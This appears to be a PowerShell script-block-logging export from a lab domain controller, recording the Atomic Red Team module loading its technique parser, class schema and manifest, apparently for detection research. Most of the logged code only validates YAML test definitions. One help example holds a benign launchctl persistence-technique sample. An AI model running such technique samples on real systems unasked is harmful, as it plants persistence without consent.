            $AtomicTestInstance.executor = $ExecutorInstance

            $AtomicTests[$i] = $AtomicTestInstance
        }

        $AtomicInstance.atomic_tests = $AtomicTests

        $AtomicInstance
    }
}


ScriptBlock ID: 871882b4-86e5-4a1a-85c3-493facc5b9d9
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467171
Keywords=None
Message=Creating Scriptblock text (1 of 2):
filter Get-AtomicTechnique {
    <#
    .SYNOPSIS
    
    Retrieve and validate an atomic technique.
    
    .DESCRIPTION
    
    Get-AtomicTechnique retrieves and validates one or more atomic techniques. Get-AtomicTechnique supports retrieval from YAML files or from a raw YAML string.
    
    This function facilitates the following use cases:
    
    1) Validation prior to execution of atomic tests.
    2) Writing code to reason over one or more atomic techniques/tests.
    3) Representing atomic techniques/tests in a format that is more conducive to PowerShell. ConvertFrom-Yaml returns a large, complicated hashtable that is difficult to work with and reason over. Get-AtomicTechnique helps abstract those challenges away.
    4) Representing atomic techniques/tests in a format that can be piped directly to ConvertTo-Yaml.
    
    .PARAMETER Path
    
    Specifies the path to an atomic technique YAML file. Get-AtomicTechnique expects that the file extension be .yaml or .yml and that it is well-formed YAML content.
    
    .PARAMETER Yaml
    
    Specifies a single string consisting of raw atomic technique YAML.
    
    .EXAMPLE
    
    Get-ChildItem -Path C:\atomic-red-team\atomics\* -Recurse -Include 'T*.yaml' | Get-AtomicTechnique
    
    .EXAMPLE
    
    Get-Item C:\atomic-red-team\atomics\T1117\T1117.yaml | Get-AtomicTechnique
    
    .EXAMPLE
    
    Get-AtomicTechnique -Path C:\atomic-red-team\atomics\T1117\T1117.yaml
    
    .EXAMPLE
    
    $Yaml = @'
    ---
    attack_technique: T1152
    display_name: Launchctl
    
    atomic_tests:
    - name: Launchctl
      description: |
        Utilize launchctl
    
      supported_platforms:
        - macos
    
      executor:
        name: sh
        command: |
          launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
    '@
    
    Get-AtomicTechnique -Yaml $Yaml
    
    .INPUTS
    
    System.IO.FileInfo
    
    The output of Get-Item and Get-ChildItem can be piped directly into Get-AtomicTechnique.
    
    .OUTPUTS
    
    AtomicTechnique
    
    Outputs an object representing a parsed and validated atomic technique.
    #>
    
    [CmdletBinding(DefaultParameterSetName = 'FilePath')]
    [OutputType([AtomicTechnique])]
    param (
        [Parameter(Mandatory, ValueFromPipelineByPropertyName, ParameterSetName = 'FilePath')]
        [String]
        [Alias('FullName')]
        [ValidateScript({ Test-Path -Path $_ -Include '*.yaml', '*.yml' })]
        $Path,

        [Parameter(Mandatory, ParameterSetName = 'Yaml')]
        [String]
        [ValidateNotNullOrEmpty()]
        $Yaml
    )


    switch ($PSCmdlet.ParameterSetName) {
        'FilePath' {
            $ResolvedPath = Resolve-Path -Path $Path

            $YamlContent = Get-Content -Path $ResolvedPath -Raw
            $ErrorStringPrefix = "[$($ResolvedPath)]"
        }

        'Yaml' {
            $YamlContent = $Yaml
            $ErrorStringPrefix = ''
        }
    }

    $ParsedYaml = $null

    $ValidSupportedPlatforms = @('windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp')
    $ValidInputArgTypes = @('Path', 'Url', 'String', 'Integer', 'Float')
    $ValidExecutorTypes = @('command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud')

    # ConvertFrom-Yaml will throw a .NET exception rather than a PowerShell error.
    # Capture the exception and convert to PowerShell error so that the user can decide
    # how to handle the error.
    try {
        [Hashtable] $ParsedYaml = ConvertFrom-Yaml -Yaml $YamlContent
    } catch {
        Write-Error $_
    }

    if ($ParsedYaml) {
        # The document was well-formed YAML. Now, validate against the atomic red schema

        $AtomicInstance = [AtomicTechnique]::new()

        if (-not $ParsedYaml.Count) {
            Write-Error "$ErrorStringPrefix YAML file has no elements."
            return
        }

        if (-not $ParsedYaml.ContainsKey('attack_technique')) {
            Write-Error "$ErrorStringPrefix 'attack_technique' element is required."
            return
        }

        $AttackTechnique = $null

        if ($ParsedYaml['attack_technique'].Count -gt 1) {
            # An array of attack techniques are supported.
            foreach ($Technique in $ParsedYaml['attack_technique']) {
                if ("$Technique" -notmatch '^(?-i:T\d{4}(\.\d{3}){0,1})$') {
                    Write-Warning "$ErrorStringPrefix Attack technique: $Technique. Each attack technique should start with the letter 'T' followed by a four digit number."
                }

                [String[]] $AttackTechnique = $ParsedYaml['attack_technique']
            }
        } else {
            if ((-not "$($ParsedYaml['attack_technique'])".StartsWith('T'))) {
                # If the attack technique is a single entry, validate that it starts with the letter T.
                Write-Warning "$ErrorStringPrefix Attack technique: $($ParsedYaml['attack_technique']). Attack techniques should start with the letter T."
            }

            [String] $AttackTechnique = $ParsedYaml['attack_technique']
        }

        $AtomicInstance.attack_technique = $AttackTechnique

        if (-not $ParsedYaml.ContainsKey('display_name')) {
            Write-Error "$ErrorStringPrefix 'display_name' element is required."
            return
        }

        if (-not ($ParsedYaml['display_name'] -is [String])) {
            Write-Error "$ErrorStringPrefix 'display_name' must be a string."
            return
        }

        $AtomicInstance.display_name = $ParsedYaml['display_name']

        if (-not $ParsedYaml.ContainsKey('atomic_tests')) {
            Write-Error "$ErrorStringPrefix 'atomic_tests' element is required."
            return
        }

        if (-not ($ParsedYaml['atomic_tests'] -is [System.Collections.Generic.List`1[Object]])) {
            Write-Error "$ErrorStringPrefix 'atomic_tests' element must be an array."
            return
        }

        $AtomicTests = [AtomicTest[]]::new($ParsedYaml['atomic_tests'].Count)

        if (-not $ParsedYaml['atomic_tests'].Count) {
            Write-Error "$ErrorStringPrefix 'atomic_tests' element is empty - you have no tests."
            return
        }

        for ($i = 0; $i -lt $ParsedYaml['atomic_tests'].Count; $i++) {
            $AtomicTest = $ParsedYaml['atomic_tests'][$i]

            $AtomicTestInstance = [AtomicTest]::new()

            $StringsWithPotentialInputArgs = New-Object -TypeName 'System.Collections.Generic.List`1[String]'

            if (-not $AtomicTest.ContainsKey('name')) {
                Write-Error "$ErrorStringPrefix 'atomic_tests[$i].name' element is required."
                return
            }

            if (-not ($AtomicTest['name'] -is [String])) {
                Write-Error "$ErrorStringPrefix 'atomic_tests[$i].name' element must be a string."
                return
            }

            $AtomicTestInstance.name = $AtomicTest['name']
            $AtomicTestInstance.auto_generated_guid = $AtomicTest['auto_generated_guid']

            if (-not $AtomicTest.ContainsKey('description')) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].description' element is required."
                return
            }

            if (-not ($AtomicTest['description'] -is [String])) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].description' element must be a string."
                return
            }

            $AtomicTestInstance.description = $AtomicTest['description']

            if (-not $AtomicTest.ContainsKey('supported_platforms')) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].supported_platforms' element is required."
                return
            }

            if (-not ($AtomicTest['supported_platforms'] -is [System.Collections.Generic.List`1[Object]])) {
                Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].supported_platforms' element must be an array."
                return
            }

            foreach ($SupportedPlatform in $AtomicTest['supported_platforms']) {
                if ($ValidSupportedPlatforms -cnotcontains $SupportedPlatform) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].supported_platforms': '$SupportedPlatform' must be one of the following: $($ValidSupportedPlatforms -join ', ')."
                    return
                }
            }

            $AtomicTestInstance.supported_platforms = $AtomicTest['supported_platforms']

            $Dependencies = $null

            if ($AtomicTest['dependencies'].Count) {
                $Dependencies = [AtomicDependency[]]::new($AtomicTest['dependencies'].Count)
                $j = 0

                # dependencies are optional and there can be multiple
                foreach ($Dependency in $AtomicTest['dependencies']) {
                    $DependencyInstance = [AtomicDependency]::new()

                    if (-not $Dependency.ContainsKey('description')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].description' element is required."
                        return
                    }

                    if (-not ($Dependency['description'] -is [String])) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].description' element must be a string."
                        return
                    }

                    $DependencyInstance.description = $Dependency['description']
                    $StringsWithPotentialInputArgs.Add($Dependency['description'])

                    if (-not $Dependency.ContainsKey('prereq_command')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].prereq_command' element is required."
                        return
                    }

                    if (-not ($Dependency['prereq_command'] -is [String])) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].prereq_command' element must be a string."
                        return
                    }

                    $DependencyInstance.prereq_command = $Dependency['prereq_command']
                    $StringsWithPotentialInputArgs.Add($Dependency['prereq_command'])

                    if (-not $Dependency.ContainsKey('get_prereq_command')) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].get_prereq_command' element is required."
                        return
                    }

                    if (-not ($Dependency['get_prereq_command'] -is [String])) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependencies[$j].get_prereq_command' element must be a string."
                        return
                    }

                    $DependencyInstance.get_prereq_command = $Dependency['get_prereq_command']
                    $StringsWithPotentialInputArgs.Add($Dependency['get_prereq_command'])

                    $Dependencies[$j] = $DependencyInstance

                    $j++
                }

                $AtomicTestInstance.dependencies = $Dependencies
            }

            if ($AtomicTest.ContainsKey('dependency_executor_name')) {
                if ($ValidExecutorTypes -notcontains $AtomicTest['dependency_executor_name']) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].dependency_executor_name': '$($AtomicTest['dependency_executor_name'])' must be one of the following: $($ValidExecutorTypes -join ', ')."
                    return
                }

                if ($null -eq $AtomicTestInstance.Dependencies) {
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] If 'atomic_tests[$i].dependency_executor_name' is defined, there must be at least one dependency defined."
                }

                $AtomicTestInstance.dependency_executor_name = $AtomicTest['dependency_executor_name']
            }

            $InputArguments = $null

            # input_arguments is optional
            if ($AtomicTest.ContainsKey('input_arguments')) {
                if (-not ($AtomicTest['input_arguments'] -is [Hashtable])) {
                    $AtomicTest['input_arguments'].GetType().FullName
                    Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] 'atomic_tests[$i].input_

ScriptBlock ID: 871882b4-86e5-4a1a-85c3-493facc5b9d9
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467170
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3f922c3b-b8fe-4beb-bc7c-2f38965e3f24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467169
Keywords=None
Message=Started invocation of ScriptBlock ID: 3f922c3b-b8fe-4beb-bc7c-2f38965e3f24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467168
Keywords=None
Message=Started invocation of ScriptBlock ID: 6d3e6677-f948-4e19-b867-151cde9a5a60
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467167
Keywords=None
Message=Creating Scriptblock text (1 of 1):
#requires -Version 5.0

#Get public and private function definition files.
$Public = @( Get-ChildItem -Path $PSScriptRoot\Public\*.ps1 -Recurse -ErrorAction SilentlyContinue )
$Private = @( Get-ChildItem -Path $PSScriptRoot\Private\*.ps1 -Recurse -Exclude "AtomicClassSchema.ps1" -ErrorAction SilentlyContinue )

# Make sure the Atomic Class Schema is available first (a workaround so PSv5.0 doesn't give errors)
. "$PSScriptRoot\Private\AtomicClassSchema.ps1"

#Dot source the files
Foreach ($import in @($Public + $Private)) {
    Try {
        . $import.fullname
    }
    Catch {
        Write-Error -Message "Failed to import function $($import.fullname): $_"
    }
}

ScriptBlock ID: 6d3e6677-f948-4e19-b867-151cde9a5a60
Path: C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psm1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467166
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3f922c3b-b8fe-4beb-bc7c-2f38965e3f24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467165
Keywords=None
Message=Started invocation of ScriptBlock ID: 3f922c3b-b8fe-4beb-bc7c-2f38965e3f24
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467164
Keywords=None
Message=Creating Scriptblock text (1 of 1):
class AtomicDependency {
    [String] $description
    [String] $prereq_command
    [String] $get_prereq_command
}

class AtomicInputArgument {
    [String] $description
    [String] $type
    [String] $default
}

class AtomicExecutorBase {
    [String] $name
    [Bool] $elevation_required

    # Implemented to facilitate improved PS object display
    [String] ToString(){
        return $this.Name
    }
}

class AtomicExecutorDefault : AtomicExecutorBase {
    [String] $command
    [String] $cleanup_command
}

class AtomicExecutorManual : AtomicExecutorBase {
    [String] $steps
    [String] $cleanup_command
}

class AtomicTest {
    [String] $name
    [String] $auto_generated_guid
    [String] $description
    [String[]] $supported_platforms
    # I wish this didn't have to be a hashtable but I don't
    # want to change the schema and introduce a breaking change.
    [Hashtable] $input_arguments
    [String] $dependency_executor_name
    [AtomicDependency[]] $dependencies
    [AtomicExecutorBase] $executor

    # Implemented to facilitate improved PS object display
    [String] ToString(){
        return $this.name
    }
}

class AtomicTechnique {
    [String[]] $attack_technique
    [String] $display_name
    [AtomicTest[]] $atomic_tests
}

ScriptBlock ID: 3f922c3b-b8fe-4beb-bc7c-2f38965e3f24
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\AtomicClassSchema.ps1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467163
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7ee32596-bb40-4f58-afb6-1236c619b6fc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467162
Keywords=None
Message=Started invocation of ScriptBlock ID: 7ee32596-bb40-4f58-afb6-1236c619b6fc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467161
Keywords=None
Message=Creating Scriptblock text (1 of 1):
#
# Module manifest for module 'Invoke-AtomicRedTeam'
#
# Generated by: Josh Rickard
#
# Generated on: 09/13/2018
#

@{

    # Script module or binary module file associated with this manifest.
    RootModule        = 'Invoke-AtomicRedTeam.psm1'

    # Version number of this module.
    ModuleVersion     = '1.0.0.0'

    # Supported PSEditions
    # CompatiblePSEditions = @('Desktop')

    # ID used to uniquely identify this module
    GUID              = '8f492621-18f8-432e-9532-b1d54d3e90bd'

    # Author of this module
    Author            = 'Casey Smith @subTee, Josh Rickard @MS_dministrator'

    # Company or vendor of this module
    CompanyName       = 'Red Canary'

    # Copyright statement for this module
    Copyright         = '(c) 2018 Red Canary. All rights reserved.'

    # Description of the functionality provided by this module
    Description          = 'A PowerShell module that runs Atomic Red Team tests from yaml definition files.'

    # Minimum version of the Windows PowerShell engine required by this module
    PowerShellVersion = '5.0'

    # Name of the Windows PowerShell host required by this module
    # PowerShellHostName = ''

    # Minimum version of the Windows PowerShell host required by this module
    # PowerShellHostVersion = ''

    # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
    # DotNetFrameworkVersion = ''

    # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
    # CLRVersion = ''

    # Processor architecture (None, X86, Amd64) required by this module
    # ProcessorArchitecture = ''

    # Modules that must be imported into the global environment prior to importing this module
    # RequiredModules = @()

    # Assemblies that must be loaded prior to importing this module
    # RequiredAssemblies = @()

    # Script files (.ps1) that are run in the caller's environment prior to importing this module.
    # AtomicClassSchema.ps1 needs to be present in the caller's scope in order for the built-in classes to surface properly.
    ScriptsToProcess = @('Private\AtomicClassSchema.ps1')

    # Type files (.ps1xml) to be loaded when importing this module
    # TypesToProcess = @()

    # Format files (.ps1xml) to be loaded when importing this module
    # FormatsToProcess = @()

    # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
    # NestedModules = @()

    # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
    FunctionsToExport = @(
        'Invoke-AtomicTest',
        'Get-AtomicTechnique',
        'New-AtomicTechnique',
        'New-AtomicTest',
        'New-AtomicTestInputArgument',
        'New-AtomicTestDependency',
        'Start-AtomicGUI',
        'Stop-AtomicGUI'
    )

    # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
    CmdletsToExport   = @()

    # Variables to export from this module
    VariablesToExport = '*'

    # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
    AliasesToExport   = @()

    # DSC resources to export from this module
    # DscResourcesToExport = @()

    # List of all modules packaged with this module
    # ModuleList = @()

    # List of all files packaged with this module
    # FileList = @()

    # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
    PrivateData       = @{

        PSData = @{

            # Tags applied to this module. These help with module discovery in online galleries.
            Tags = @('Red Canary', 'Atomic', 'Red Team', 'MITRE', 'ATT&CK', 'ART')

            # A URL to the license for this module.
            LicenseUri   = 'https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt'

            # A URL to the main website for this project.
            ProjectUri = 'https://github.com/redcanaryco/atomic-red-team'

            # A URL to an icon representing this module.
            # IconUri = ''

            # ReleaseNotes of this module
            #ReleaseNotes = ''

        } # End of PSData hashtable

    } # End of PrivateData hashtable

    # HelpInfo URI of this module
    # HelpInfoURI = ''

    # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
    # DefaultCommandPrefix = ''

}



ScriptBlock ID: 7ee32596-bb40-4f58-afb6-1236c619b6fc
Path: C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467160
Keywords=None
Message=Completed invocation of ScriptBlock ID: 21ff2f47-7fd8-427b-b75b-f899cb75b195
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467159
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7f59b431-a6d7-45b8-90d7-3ebfca7d3218
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467158
Keywords=None
Message=Started invocation of ScriptBlock ID: 7f59b431-a6d7-45b8-90d7-3ebfca7d3218
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467157
Keywords=None
Message=Completed invocation of ScriptBlock ID: 37050256-7150-4800-916d-0ff78e5de88b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467156
Keywords=None
Message=Started invocation of ScriptBlock ID: 37050256-7150-4800-916d-0ff78e5de88b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467155
Keywords=None
Message=Completed invocation of ScriptBlock ID: a7d8a0a4-d814-4517-8b25-70196418f9e5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467154
Keywords=None
Message=Started invocation of ScriptBlock ID: a7d8a0a4-d814-4517-8b25-70196418f9e5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467153
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3bd07744-70bb-4f11-98d1-910925832092
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467152
Keywords=None
Message=Started invocation of ScriptBlock ID: 3bd07744-70bb-4f11-98d1-910925832092
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467151
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5c814055-649a-4be4-8b8c-473adad2bb2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467150
Keywords=None
Message=Started invocation of ScriptBlock ID: 5c814055-649a-4be4-8b8c-473adad2bb2f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467149
Keywords=None
Message=Completed invocation of ScriptBlock ID: 84cd98af-2c82-4e5a-9203-6398b3ef2099
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:36 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467148
Keywords=None
Message=Started invocation of ScriptBlock ID: 84cd98af-2c82-4e5a-9203-6398b3ef2099
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467312
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:03 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
